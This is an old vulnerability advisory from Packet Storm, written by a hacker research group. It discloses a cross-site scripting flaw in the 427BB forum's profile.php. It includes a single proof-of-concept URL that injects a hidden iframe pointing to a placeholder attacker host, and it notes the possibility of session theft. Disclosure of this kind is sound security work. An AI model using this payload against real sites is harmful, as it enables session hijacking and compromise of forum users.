HRG007.txt

2005-03-03T00:00:00
ID PACKETSTORM:36409
Type packetstorm
Reporter Raven
Modified 2005-03-03T00:00:00

Description

                                        
                                            `  
  
[][][][][][][][][][][][][][][][][][][][][][][][][][]  
[][][]   
[]   
[] HRG - Hackerlounge Research Group   
[] Release: HRG007   
[] Monday 03/01/05   
[] 427BB   
[]   
[] The author can't be held responsible for any   
damage   
[] done by a reader. You have your own resonsibility   
[] Please use this document like it's meant to.   
[]   
[][][][][][][][][][][][][][][][][][][][][][][][][][]  
[][][]   
  
Vulnerable: 427BB (Any Version)   
  
  
---   
  
General Information:   
  
427BB Is a simple board and I have no idea why I'm   
releasing this because Its Very unpopular But I said   
What the hell. Its based on PHP And MySQL   
  
---   
  
Description:   
  
In profile.php there is a user var that is   
vulnerable to a XSS attack by a remote attacker. The   
user string isn't filtered of < > or ". This makes is   
very easy for a attacker to steal a session and many   
other things.   
  
---   
  
PoC Code   
Place the following code into the the url then   
reload the profile page and it will execute this   
code.   
  
profile.php?user=%3Ciframe%20src=http://www.evilhost.com%20height=1%20width=1%3E%3C/iframe%3E   
  
This is very unsafe and vuln because you can execute   
any code you would like and can lead to manger damage   
of the forum you are attacking.   
  
---   
  
Fix and Vendor status:   
  
Vendor has been notified, expect official patch soon.   
  
---   
  
Greetz:   
  
All the people at hackerlounge.com, JWT,   
TGS-Security.com and JWT-Security.net.   
Specifically:   
  
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster,   
Modzilla, Pingu, Jake Johnson, Afterburn, airo,   
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,   
evasion, eXtacy, Mattewan, Afterburn,   
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,   
Slarty, NoUse, Snake (I hate you), Surreal (I hate   
you), -=Vanguard=-, The_IRS, puNKiey, driedice,   
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,   
voteforpedro, Cryptic_Override, kodaxx,   
~CreEpy~NoDquE~, Brainscan, the_exode,   
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and   
anyone else I forgot.   
  
  
---   
  
Credit:   
  
HRG - Hackerlounge Research Group   
http://www.Hackerlounge.com   
  
Partial credit is also given to   
lancastertechnologies.org, founded by JWT.   
  
  
[][][][][][][][][][][][][][][][][][][][][][][][][][]  
[][][]   
[]   
[] HRG - Hackerlounge Research Group   
[] Release: HRG007   
[] Monday 03/01/05   
[] 427BB   
[]   
[] The author can't be held responsible for any   
damage   
[] done by a reader. You have your own resonsibility   
[] Please use this document like it's meant to.   
[]   
[][][][][][][][][][][][][][][][][][][][][][][][][][]  
[][][]   
`